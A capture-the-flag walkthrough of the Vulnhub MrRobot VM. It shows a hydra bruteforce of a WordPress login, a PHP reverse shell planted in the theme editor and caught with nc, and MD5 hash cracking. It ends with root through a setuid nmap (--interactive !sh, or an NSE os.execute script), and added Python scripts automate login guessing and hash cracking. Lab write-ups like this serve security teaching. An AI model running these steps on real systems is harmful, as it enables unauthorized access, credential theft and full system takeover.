Vulnhub Writeup : MrRobot

Box Stats :

Box Information   Details
Box Name          MrRobot
Release Date      28 Jun 2016
Author            Leon Johnson
Download Link     Link

Network Scan

The IP of the target VM is

$ nmap -sV -oN target.scan
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

Only two ports are open. Port 80 serves a web page, but nothing of interest is visible on it.

Web App Recon

Directory Bruteforce

Scanning the target web server for hidden URLs and other files:

$ dirb -o dirb.scan

The scan stops on a warning (the attacker machine runs in a Docker container), so the -w option is needed to make dirb continue past warnings:

$ dirb -w -o dirb.scan

Scanning the WordPress site with wpscan:

$ wpscan --url

Some of the important findings are :


The scan confirms that a WordPress website is hosted on the target.

The robots.txt file has some interesting entries, so first download it:

$ wget
--2019-11-13 15:52:46--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 41 [text/plain]
Saving to: 'robots.txt'
robots.txt           100%[========================>]      41  --.-KB/s    in 0s
2019-11-13 15:52:46 (4.69 MB/s) - 'robots.txt' saved [41/41]
$ cat robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

As we can see, robots.txt reveals our first key and another file, fsocity.dic. Download the key first:

$ wget
$ cat key-1-of-3.txt

It contains the flag value. Now let's check the other file:

$ wget

This file contains 858160 lines:

$ wc -l fsocity.dic
858160 fsocity.dic

Now sort the file and remove the duplicates:

$ sort -u fsocity.dic > fsocity_sorted.dic

The deduplicated list has 11451 lines. It looks like a wordlist for the WordPress login, so use it to bruteforce the login: first the username field, then the password field. For the bruteforce we use hydra.

BruteForcing WordPress Login with Hydra

For the basics of hydra, refer to this Link.

Bruteforcing username:

$ hydra -vV -L fsocity_sorted.dic -p randompass http-post-form  \
   "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -o success

The -o success option writes the working credentials to a file. Contents of the success file :

[80][http-post-form] host:   login: ELLIOT   password: randompass
[80][http-post-form] host:   login: Elliot   password: randompass
[80][http-post-form] host:   login: elliot   password: randompass

All three spellings appear because WordPress matches usernames case-insensitively, and hydra reports them as hits only because the response lacked the failure string "Invalid username", not because randompass is correct. With the username found, bruteforce the password with the same list:

$ hydra -vV -l elliot -P fsocity_sorted.dic http-post-form \ 

Note that the failure string has to change for this run: once the username is valid, WordPress answers a wrong password with "The password you entered for the username elliot is incorrect", so matching on "Invalid username" would report every password as a hit; match on "incorrect" instead.

Password found : ER28-0652

We can also use wpscan, for example :

$ wpscan --url --usernames elliot --passwords \
    fsocity_sorted.dic --wp-content-dir ""
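The two-phase bruteforce above (enumerate the username, then guess its password) depends entirely on WordPress returning different error text for "no such user" and "wrong password". The following script is an added example, not the writeup's own code and not hydra's: it implements that same logic with a pluggable poster, runs offline against a constructed stand-in for the target (fake_wp_login, seeded with the elliot / ER28-0652 credentials the writeup found, and imitating WordPress 4.x error messages), and includes make_http_poster() for a real wp-login.php URL (the URL is an assumption and is not called here).

```python
"""Username enumeration and password guessing against wp-login.php.

Added example, not the writeup's own code. It mirrors the two hydra runs:
WordPress 4.x answers an unknown user with "Invalid username" and a known
user with a wrong password with "...is incorrect", so the error text leaks
which accounts exist. The target used here, fake_wp_login(), is a
constructed stand-in (no network) seeded with the credentials the writeup
found; make_http_poster() builds the equivalent poster for a real
wp-login.php URL (assumed URL, not taken from the page).
"""
import urllib.parse
import urllib.request

INVALID_USER = "Invalid username"   # failure string of the username run
WRONG_PASS = "is incorrect"          # failure string of the password run


def classify(body):
    """Map a wp-login.php response body to one of three outcomes."""
    if INVALID_USER in body:
        return "no_such_user"
    if WRONG_PASS in body:
        return "wrong_password"
    return "success"


def enumerate_users(post, candidates, probe_password="randompass"):
    """Like 'hydra -L list -p randompass ... :Invalid username'.

    A candidate is reported whenever the failure string is absent, which
    is why hydra lists hits even though the probe password is wrong."""
    return [u for u in candidates
            if classify(post(u, probe_password)) != "no_such_user"]


def brute_password(post, user, candidates):
    """Like 'hydra -l user -P list ...' with the failure string this phase
    needs ("is incorrect"); returns the first password that logs in."""
    for pwd in candidates:
        if classify(post(user, pwd)) == "success":
            return pwd
    return None


def make_http_poster(login_url):
    """Return post(user, pwd) sending the same form fields hydra sends.
    Only for a real target; nothing below calls it."""
    def post(user, pwd):
        data = urllib.parse.urlencode(
            {"log": user, "pwd": pwd, "wp-submit": "Log In"}).encode()
        req = urllib.request.Request(login_url, data=data)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return post


# Constructed stand-in for the target: credentials from the writeup.
_ACCOUNTS = {"elliot": "ER28-0652"}


def fake_wp_login(user, pwd):
    """Imitate WordPress 4.x login errors. Usernames are matched
    case-insensitively, which is why ELLIOT/Elliot/elliot all hit."""
    key = user.lower()
    if key not in _ACCOUNTS:
        return "<strong>ERROR</strong>: Invalid username."
    if _ACCOUNTS[key] != pwd:
        return ("<strong>ERROR</strong>: The password you entered for the "
                "username <strong>%s</strong> is incorrect." % user)
    return "<html><title>Dashboard</title></html>"


def demo():
    """Run both phases against the stand-in with small constructed lists."""
    users = ["admin", "ELLIOT", "Elliot", "elliot", "mrrobot"]
    passwords = ["password", "fsociety", "ER28-0652", "abc123"]
    valid = enumerate_users(fake_wp_login, users)
    return valid, {u: brute_password(fake_wp_login, u, passwords) for u in valid}


if __name__ == "__main__":
    print(demo())
```

The point to take from classify() is that hydra's third form field is a failure string by default (prefix S= to make it a success string), so the string must match what the server says at that phase; a stale failure string turns every guess into a false positive. Newer WordPress releases reword the unknown-user message, so check the live response before choosing the string.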

Dropping a Backdoor on WordPress

First log in to WordPress with the above credentials and go to Appearance > Editor.

Get the PHP reverse shell code from : Click here to download

Change the IP and port in the script to those of your attacker machine, then paste it into the theme's Main Index Template (index.php).

Now start the listener for the reverse shell:

$ nc -vvlp 1234

Then load the WordPress front page in a browser; rendering index.php executes the shell and the listener receives the connection:

ajay@MBot:~$ nc -vvlp 1234
Listening on [] (family 0, port 1234)
Connection from 47906 received!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 00:13:18 up  3:57,  0 users,  load average: 0.00, 0.08, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off

In the /home/robot folder we find the 2nd key file, but the daemon user does not have permission to read it.

$ cd home/robot
$ ls
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ whoami

But we do have permission to read the password.raw-md5 file:

$ cat password.raw-md5

which looks like an unsalted MD5 password hash. To crack it we can use John the Ripper (john). Put the hash in a file and tell john the format explicitly, since a bare 32-hex-character string is ambiguous (raw MD5, MD4, NTLM and others all look the same):

$ cat passhash.txt
$ john --format=raw-md5 passhash.txt

But that takes time, so an online hash-cracking service can also be used, for example from

So the password is : abcdefghijklmnopqrstuvwxyz
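The reason this hash falls so quickly is that it is unsalted: one MD5 computation per candidate word can be checked against every hash in the file at once. The script below is an added example, not the writeup's code and not john's: it parses a constructed password.raw-md5-style file (the page does not show the real contents; the robot line uses the RFC 1321 test vector MD5("abcdefghijklmnopqrstuvwxyz") = c3fcd3d76192e4007dfb496cca67e13b, the extra line is an all-zero placeholder) and runs a dictionary attack with a few made-up words standing in for fsocity_sorted.dic.

```python
"""Dictionary attack on an unsalted raw-MD5 password file.

Added example, not the writeup's own code. The page only shows that
password.raw-md5 holds an unsalted MD5 hash and that it cracked to
abcdefghijklmnopqrstuvwxyz; the file below is constructed in the usual
'user:hash' layout. The robot line uses the RFC 1321 test vector
MD5("abcdefghijklmnopqrstuvwxyz") = c3fcd3d76192e4007dfb496cca67e13b; the
extra line is an all-zero placeholder that nothing in the wordlist hashes
to, so the uncracked path is exercised too. The wordlist is a few made-up
entries standing in for fsocity_sorted.dic.
"""
import hashlib
import re

# Constructed stand-in for /home/robot/password.raw-md5.
SAMPLE_FILE = """\
robot:c3fcd3d76192e4007dfb496cca67e13b
# comments and blank lines are skipped

extra:00000000000000000000000000000000
"""

# Constructed stand-in for fsocity_sorted.dic.
SAMPLE_WORDLIST = ["password", "fsociety", "ER28-0652",
                   "abcdefghijklmnopqrstuvwxyz", "Elliot"]

_HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_raw_md5(text):
    """Return {user: hash} from 'user:hash' lines. Hashes are lowercased;
    a malformed line raises instead of being silently skipped."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, digest = line.partition(":")
        if not sep or not _HEX32.match(digest):
            raise ValueError("line %d: not a user:md5 entry: %r" % (lineno, line))
        entries[user] = digest.lower()
    return entries


def crack(entries, wordlist):
    """Crack every hash in one pass over the wordlist.

    With no salt, one MD5 per candidate word serves all users at once:
    hash the word, look the digest up. Two users with the same password
    fall together. This cheapness is exactly why salts matter."""
    wanted = {}
    for user, digest in entries.items():
        wanted.setdefault(digest, []).append(user)
    cracked = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in wanted.pop(digest, []):
            cracked[user] = word
        if not wanted:
            break
    return cracked


def demo():
    return crack(parse_raw_md5(SAMPLE_FILE), SAMPLE_WORDLIST)


if __name__ == "__main__":
    for user, pwd in demo().items():
        print("%s:%s" % (user, pwd))
```

Replace SAMPLE_FILE with the real file contents and SAMPLE_WORDLIST with the lines of fsocity_sorted.dic to use it on the box; for anything larger than a few thousand candidates john or hashcat with --format=raw-md5 / -m 0 is the right tool, but the lookup structure is the same.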

Now let's try to log in as robot with the above password:

$ sudo robot
sudo: no tty present and no askpass program specified
$ python -c 'import pty; pty.spawn("/bin/bash")'  
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt

That gives the 2nd flag. Note that python -c 'import pty; pty.spawn("/bin/bash")' upgrades the raw reverse shell to a pseudo-terminal; su, like the sudo attempt above that failed with "no tty present", refuses to prompt for a password without one.

Privilege Escalation to root

There are various methods for privilege escalation; a reference list can be found here : Link (Click Here)

For this VM, first look for binaries that are SUID root:

$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null

-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown

The find command lists files that have the SUID bit set (-perm -4000) and are owned by root (-user root); -exec runs ls -ld on each match, and 2>/dev/null discards the permission errors from directories the daemon user cannot read.

Among them, one entry stands out, since nmap is not normally installed setuid and sits in /usr/local/bin rather than a package-managed path:

-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
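Picking nmap out of that list by eye works on a 17-line listing; on a real host the practical approach is to diff the setuid set against a known-good baseline. The script below is an added example, not the writeup's code: it parses the ls -ld listing printed above (embedded so it runs offline), flags every setuid-root path not in a baseline, and also includes a live-scan function equivalent to the find command. The baseline is an assumption for illustration (this box's own listing minus the suspicious entry, standing in for a listing captured from a clean image of the same distribution).

```python
"""Triage a SUID-root listing against a baseline of expected binaries.

Added example, not the writeup's own code. unexpected_suid() parses
'ls -ld' lines like the ones the find command above printed (that listing
is embedded here so the script runs offline) and reports every setuid-root
file not in a baseline. The baseline is an assumption: it is this box's
own listing minus the suspicious entry, standing in for a listing captured
from a clean image of the same distribution. find_suid_live() performs the
same search on a running host, like 'find / -perm -4000 -user root'.
"""
import os
import stat

# Output of the find command on the box, as printed in the writeup.
LISTING = """\
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown
"""

# Assumed baseline: what a clean image of the same distro (plus VMware
# Tools) is expected to carry. Everything else is worth a look.
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}


def parse_ls_ld(text):
    """Yield (mode, owner, path) per 'ls -ld' line. The path is taken as
    the last whitespace-separated field, so this assumes no spaces in paths."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 9 or len(parts[0]) < 10:
            continue
        yield parts[0], parts[2], parts[-1]


def is_setuid_mode(mode):
    """True when the owner-execute slot shows the setuid bit: 's' means
    setuid + exec, 'S' means setuid without exec (still worth flagging)."""
    return mode[3] in "sS"


def unexpected_suid(text, baseline=BASELINE):
    """Setuid-root paths from the listing that the baseline does not cover."""
    return sorted(path for mode, owner, path in parse_ls_ld(text)
                  if owner == "root" and is_setuid_mode(mode)
                  and path not in baseline)


def find_suid_live(root="/"):
    """Walk the filesystem and return setuid regular files owned by root.
    lstat() is used so symlinks are not followed; unreadable entries are
    skipped, like 2>/dev/null in the find invocation."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == 0):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for path in unexpected_suid(LISTING):
        print("unexpected setuid-root binary:", path)
```

The same comparison is what a defender's file-integrity check does in reverse: a setuid-root binary appearing in /usr/local/bin, /opt or a home directory is a finding on either side of the engagement.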

There is a well-known way to get a root shell from a SUID nmap if it still supports the --interactive option, described in this article :

Interactive mode only exists in old nmap releases (roughly 2.02 through 5.21; this box ships 3.81). On newer builds the same effect comes from an NSE script: put os.execute('/bin/sh') in a .nse file and run it with nmap --script=<file>.

Now get a root shell with nmap:

$ nmap --interactive
Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root

We get a root shell. Now let's find the 3rd key:

# cd /root
cd /root
# ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt

That's it!

We found all the keys.
